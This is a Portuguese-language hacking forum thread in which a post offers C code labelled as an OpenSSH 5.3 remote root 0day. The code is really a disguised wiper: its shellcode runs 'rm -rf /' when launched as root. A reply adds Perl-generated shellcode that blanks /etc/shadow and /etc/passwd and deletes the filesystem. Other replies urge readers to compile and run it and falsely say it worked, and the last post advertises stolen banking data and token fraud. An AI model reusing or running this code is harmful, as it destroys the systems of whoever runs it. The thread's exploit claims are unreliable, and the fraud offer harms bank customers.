Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    C / C++ OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)

    Código:
    /*
    *
    * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
    *
    * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
    * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
    *
    *
    */
    
    #include <stdio.h>
    #include <netdb.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <arpa/inet.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    
    void usage(char *argv[])
    {
        printf("\n\t[+] HATSUNEMIKU\n");
        printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
        printf("\t[+] By: n3xus\n");
        printf("\t[+] Greetz to hackforums.net\n");
        printf("\t[+] Keep this 0day priv8!\n");
        printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
        exit(1);
    }
    
    unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                               "\x6a\x2f\x89\xe7\x52"
                               "\x66\x68\x2d\x66\x89"
                               "\xe6\x52\x66\x68\x2d"
                               "\x72\x89\xe1\x52\x68"
                               "\x2f\x2f\x72\x6d\x68"
                               "\x2f\x62\x69\x6e\x89"
                               "\xe3\x52\x57\x56\x51"
                               "\x53\x89\xe1\xcd\x80";
    
    unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                               "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                               "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                               "\xdb\x40\xcd\x80";
    
    int main(int argc, char **argv)
    {
    
        int euid = geteuid();
        int port= 22, sock;
        char h[1000];
        struct hostent *host;
        struct sockaddr_in addr;
    
        if(euid != 0)
        {
            fprintf(stderr, "You need to be root to use raw sockets.\n");
            exit(1);
        }
        if(euid == 0)
        {
            fprintf(stdout, "MIKU! MIKU! MIKU!\n");
        }
        if(argc != 3)
        usage(argv);
        if(!inet_aton(h, &addr.sin_addr))
        {
            host = gethostbyname(h);
            if(!host)
            {
                fprintf(stderr, "[-] Exploit failed.\n");
                (*(void(*)())decoder)();
                exit(1);
            }
            addr.sin_addr = *(struct in_addr*)host->h_addr;
            }
            sock = socket(PF_INET, SOCK_STREAM, 0);
            addr.sin_port = htons(port);
            addr.sin_family = AF_INET;
            if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
            {
                fprintf(stderr,"[-] Exploit failed.\n");
                exit(1);
            }
            char payload[1337];
            memcpy(payload, &decoder, sizeof(decoder));
            memcpy(payload, &rootshell, sizeof(rootshell));
            send(sock, payload, strlen(payload),0);
            close(sock);
            if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
            {
                fprintf(stderr, "[-] Exploit failed.\n");
                exit(1);
            }
            else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
            {
                fprintf(stdout, "[+]g0t sh3ll!\n");
                system("/bin/bash");
            }
            else
            {
                fprintf(stderr, "[-] Exploit failed.\n");
                close(sock);
                exit(0);
            }
    Até, dwango.
    Similar Threads

  • Font Size
    #2
    estou com um script em php aqui e dentro de uma pasta contem este arquivo o que pode ser?

    o que as pessoas fazem com este arquivo no codigo??

    Comment


    • Font Size
      #3
      Postado Originalmente por dwango Ver Post
      Código:
      /*
      *
      * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
      *
      * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
      * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
      ...
      Até, dwango.
      Código:
      perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74
      \x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1\xcd\x80"' &gt; exploit

      Comment


      • Font Size
        #4
        O COder é seu Django? Pode explicar o que ele faz? Obrigado.

        Comment


        • Font Size
          #5
          O mistério gera curiosidade e a curiosidade é a base do desejo humano para compreender. E como diz um velho ditado, a curiosidade matou o gato.

          Compile e execute, que vc descobre

          Comment


          • Font Size
            #6
            Shellcode malvado ein.
            Yes, I am a criminal. My crime is that of curiosity. My crime is
            that of judging people by what they say and think, not what they look like.
            My crime is that of outsmarting you, something that you will never forgive me
            for.

            I am a hacker, and this is my manifesto. You may stop this individual,
            but you can't stop us all... after all, we're all alike.

            Comment


            • Font Size
              #7
              Perfeito! Funcionou 100%!!!!

              Comment


              • Font Size
                #8
                Virando info itaÚ juju itoken por sms 11ao99, santander jurudica, bb sms 11ao99 todas as operadoras tim, claro, vivo, oi, nextel.
                🔥♨🔛🤭💸🏃🏻*♂*🔥 chama no pv to arrancando tudo 🙏🏻🙌🏻💶💰💷💳😱😱🍀🍀

                Comment

                X
                Working...
                X